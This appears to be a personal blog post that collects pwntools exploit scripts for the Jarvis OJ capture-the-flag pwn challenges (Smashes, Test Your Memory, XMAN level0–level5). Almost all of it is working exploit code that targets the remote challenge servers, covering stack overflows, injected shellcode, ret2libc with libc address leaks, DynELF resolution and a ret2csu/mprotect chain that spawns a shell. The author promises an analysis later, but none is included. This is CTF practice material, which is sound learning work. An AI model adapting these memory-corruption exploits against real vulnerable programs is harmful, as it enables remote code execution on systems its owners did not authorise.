I recently worked through part of the pwn challenges on Jarvis OJ and learned a lot. Here I am simply recording the exploit scripts; the analysis and reasoning will be added later.


Tell Me Something
This challenge is similar to level0; see the level0 writeup:
http://www.cnblogs.com/WangAoBo/p/7591552.html
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

elf = ELF('./guestbook')
good_game_addr = elf.symbols['good_game']

# io = process('./guestbook')
io = remote('pwn.jarvisoj.com', 9876)

# 0x88 bytes of padding up to the saved return address, then good_game
payload = 'A' * 0x88 + p64(good_game_addr)

io.recvuntil('message:\n')
io.send(payload)
print io.recvall()
io.close()

Smashes

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'

flag_addr = 0x400d21
# offset = 0x7fffffffcd68 - 0x7fffffffcb50
# payload = 'A' * offset + p64(flag_addr)
payload = p64(flag_addr) * 200

io = remote('pwn.jarvisoj.com', 9877)
# io = process('./smashes')

io.recvuntil('name? ')
io.sendline(payload)
# io.recvuntil('flag: ')
io.recv()
io.sendline()
io.recv()

Test Your Memory
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'

elf = ELF('./memory')
win_func_addr = elf.symbols['win_func']
cat_flag_addr = elf.search('cat flag').next()

# padding, win_func, fake return address, then the "cat flag" argument
payload = 'A' * (0x13 + 0x4) + p32(win_func_addr) + p32(win_func_addr) + p32(cat_flag_addr)

# io = process('./memory')
io = remote('pwn2.jarvisoj.com', 9876)

io.recvuntil('> ')
io.sendline(payload)
print io.recvall()
io.close()

[XMAN]level0

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'

elf = ELF('./level0')
callsys_addr = elf.symbols['callsystem']

# io = process('./level0')
io = remote('pwn2.jarvisoj.com', 9881)

io.recvuntil('World\n')
payload = 'A' * (0x80 + 0x8) + p64(callsys_addr)
io.send(payload)
io.interactive()
io.close()

[XMAN]level1

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'

shellcode = asm(shellcraft.i386.linux.sh())

# io = process('./level1')
io = remote('pwn2.jarvisoj.com', 9877)

# the program prints the buffer address; strip the surrounding text
text = io.recvline()[14: -2]
# print text[14:-2]
buf_addr = int(text, 16)

payload = shellcode + 'A' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)

io.send(payload)
io.interactive()
io.close()

[XMAN]level2

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'

elf = ELF('./level2')
sys_addr = elf.symbols['system']
sh_addr = elf.search('/bin/sh').next()

payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

# io = process('./level2')
io = remote('pwn2.jarvisoj.com', 9878)

io.recvuntil('Input:\n')
io.send(payload)
io.interactive()
io.close()

[XMAN]level2_x64

level2_x64 and level3_x64 are analysed together here:
http://www.cnblogs.com/WangAoBo/p/7966773.html
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'

elf = ELF('./level2_x64')
sys_addr = elf.symbols['system']
sh_addr = elf.search('/bin/sh').next()

rop = ROP(elf)
p_rdi_r_addr = rop.rdi[0]
# print type(p_rdi_r_addr)

payload = 'A' * (0x80 + 0x8) + p64(p_rdi_r_addr) + p64(sh_addr) + p64(sys_addr) + p64(0xdeadbeef)

# io = process('./level2_x64')
io = remote('pwn2.jarvisoj.com', 9882)

io.recvuntil('Input:\n')
io.send(payload)
io.interactive()
io.close()

[XMAN]level3

level2_x64 and level3_x64 are analysed together here:
http://www.cnblogs.com/WangAoBo/p/7966773.html
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'

local = 0
if local:
    io = process('./level3')
    libc = ELF('/lib/i386-linux-gnu/libc.so.6')
else:
    io = remote('pwn2.jarvisoj.com', 9879)
    libc = ELF('./libc-2.19.so')

elf = ELF('./level3')
start_elf_addr = elf.symbols['_start']
write_elf_addr = elf.symbols['write']
read_got_addr = elf.got['read']
read_libc_addr = libc.symbols['read']
sys_libc_addr = libc.symbols['system']
sh_libc_addr = libc.search('/bin/sh').next()

# stage 1: write(1, read@got, 4) then return to _start
payload = 'A' * (0x88 + 0x04) + p32(write_elf_addr) + p32(start_elf_addr) + p32(0x1) + p32(read_got_addr) + p32(0x4)

io.recvuntil('Input:\n')
io.send(payload)

read_addr = u32(io.recv(4))
offset = read_addr - read_libc_addr
sys_addr = offset + sys_libc_addr
sh_addr = offset + sh_libc_addr

# stage 2: system("/bin/sh")
payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)

io.recvuntil('Input:\n')
io.send(payload)
io.interactive()
io.close()

[XMAN]level3_x64

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'

local = 0
if local:
    io = process('./level3_x64')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('pwn2.jarvisoj.com', 9883)
    libc = ELF('./libc-2.19.so')

elf = ELF('./level3_x64')
start_elf_addr = elf.symbols['_start']
write_elf_addr = elf.symbols['write']
read_got_addr = elf.got['read']
read_libc_addr = libc.symbols['read']
sys_libc_addr = libc.symbols['system']
sh_libc_addr = libc.search('/bin/sh').next()

rop = ROP(elf)
p_rdi_r_addr = rop.rdi[0]
p_rsi_r15_r_addr = rop.rsi[0]

# stage 1: write(1, read@got, ...) then return to _start
payload = 'A' * (0x80 + 0x8)
payload += p64(p_rdi_r_addr)
payload += p64(0x1)
payload += p64(p_rsi_r15_r_addr)
payload += p64(read_got_addr)
payload += p64(0x0)
payload += p64(write_elf_addr)
payload += p64(start_elf_addr)

io.recvuntil('Input:\n')
io.send(payload)

read_addr = u64(io.recv(0x8))
offset = read_addr - read_libc_addr
sys_addr = offset + sys_libc_addr
sh_addr = offset + sh_libc_addr

# stage 2: system("/bin/sh")
payload = 'A' * (0x80 + 0x8)
payload += p64(p_rdi_r_addr)
payload += p64(sh_addr)
payload += p64(sys_addr)
payload += p64(0xdeadbeef)

io.recvuntil('Input:\n')
io.send(payload)
io.interactive()
io.close()

[XMAN]level4

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *

context.log_level = 'debug'

# io = process('./level4')
io = remote('pwn2.jarvisoj.com', 9880)

elf = ELF('./level4')
write_elf_addr = elf.symbols['write']
start_elf_addr = elf.symbols['_start']
read_elf_addr = elf.symbols['read']
bss_addr = elf.bss()

def leak(addr):
    # write(1, addr, 4) then return to _start, so the process can be reused
    payload = 'A' * (0x88 + 0x4) + p32(write_elf_addr) + p32(start_elf_addr) + p32(0x1) + p32(addr) + p32(0x4)
    io.send(payload)
    leaked = io.recv(4)
    log.info("leaked -> %s -> 0x%x" % (leaked, u32(leaked)))
    return leaked

d = DynELF(leak, elf = ELF('./level4'))
sys_addr = d.lookup('system', 'libc')
log.info("sys_addr -> 0x%x" % sys_addr)

# read(0, bss, 8) to place "/bin/sh" in .bss, then return to _start
payload = 'A' * (0x88 + 0x4) + p32(read_elf_addr) + p32(start_elf_addr) + p32(0x0) + p32(bss_addr) + p32(0x8)
io.send(payload)
io.send('/bin/sh\0')

sh_addr = bss_addr
payload = 'A' * (0x88 + 0x4) + p32(sys_addr) + p32(0xdeadbeef) + p32(sh_addr)
io.send(payload)
io.interactive()
io.close()

[XMAN]level5

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

def Debug():
    raw_input("waiting for debug:")
    gdb.attach(io, "b *0x0000000000400618")

from pwn import *

context.terminal = ['deepin-terminal', '-x', 'bash', '-c']
context.log_level = 'debug'

elf = ELF('./level5')
rop = ROP(elf)
p_rdi_r_addr = rop.rdi[0]
p_rsi_r15_r_addr = rop.rsi[0]
# __libc_csu_init gadgets
p_rbx_rbp_r12_r13_r14_r15_r = 0x00000000004006aa
mov_call = 0x0000000000400690

local = 0
if local:
    io = process('./level5')
    libc = ELF('./libc.so.6')
else:
    io = remote('pwn2.jarvisoj.com', 9884)
    libc = ELF('./libc-2.19.so')

io.recvuntil('Input:\n')

log.info("Step 1: leak read_addr")
read_libc_addr = libc.symbols['read']
read_got_addr = elf.got['read']
write_elf_addr = elf.symbols['write']
vuln_elf_addr = elf.symbols['vulnerable_function']

payload = 'A' * (0x80 + 0x8)
payload += p64(p_rdi_r_addr)
payload += p64(0x1)
payload += p64(p_rsi_r15_r_addr)
payload += p64(read_got_addr)
payload += p64(0x0000)
payload += p64(write_elf_addr)
payload += p64(vuln_elf_addr)

io.send(payload)
read_addr = u64(io.recv(8))
io.recvuntil('Input:\n')
log.info("leaked read_addr -> 0x%x" % read_addr)

log.info("Step 2: write shellcode 2 bss")
sh_addr = bss_addr = elf.bss()
shellcode = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05"

payload = 'B' * (0x80 + 0x8)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(read_got_addr)
payload += p64(len(shellcode) + 1)
payload += p64(bss_addr)
payload += p64(0x0)
payload += p64(mov_call)
payload += 'C' * (7 * 8)
payload += p64(vuln_elf_addr)

io.send(payload)
io.send(shellcode + '\0')
io.recvuntil('Input:\n')

log.info("Step 3: hijack mprotect 2 __gmon_start__")
mprotect_addr = read_addr - read_libc_addr + libc.symbols['mprotect']
mprotect_hijack_addr = 0x0000000000600a70

payload = 'D' * (0x80 + 0x8)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(read_got_addr)
payload += p64(0x8)
payload += p64(mprotect_hijack_addr)
payload += p64(0x0)
payload += p64(mov_call)
payload += 'E' * (7 * 8)
payload += p64(vuln_elf_addr)

io.send(payload)
io.send(p64(mprotect_addr))
io.recvuntil('Input:\n')

log.info("Step 4: hijack sh/bss 2 __libc_start_main")
sh_hijack_addr = 0x0000000000600a68

payload = 'F' * (0x80 + 0x8)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(read_got_addr)
payload += p64(0x8)
payload += p64(sh_hijack_addr)
payload += p64(0x0)
payload += p64(mov_call)
payload += 'G' * (7 * 8)
payload += p64(vuln_elf_addr)

io.send(payload)
io.send(p64(sh_addr))
io.recvuntil('Input:\n')

log.info("Step 5: fix bss 2 777")
payload = 'H' * (0x80 + 0x8)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(mprotect_hijack_addr)
payload += p64(0x7)
# payload += p64(len(shellcode) + 1)
# payload += p64(sh_hijack_addr)
payload += p64(0x1000)
payload += p64(0x00600000)
payload += p64(mov_call)
payload += 'I' * (7 * 8)
payload += p64(vuln_elf_addr)

# Debug()
io.send(payload)
io.recvuntil('Input:\n')

log.info("Step 6: execv shellcode")
payload = 'J' * (0x80 + 0x8)
# payload += p64(sh_addr)
payload += p64(p_rbx_rbp_r12_r13_r14_r15_r)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(sh_hijack_addr)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(mov_call)
payload += p64(vuln_elf_addr)

io.send(payload)

log.info("Step 7: getshell")
io.interactive()
io.close()
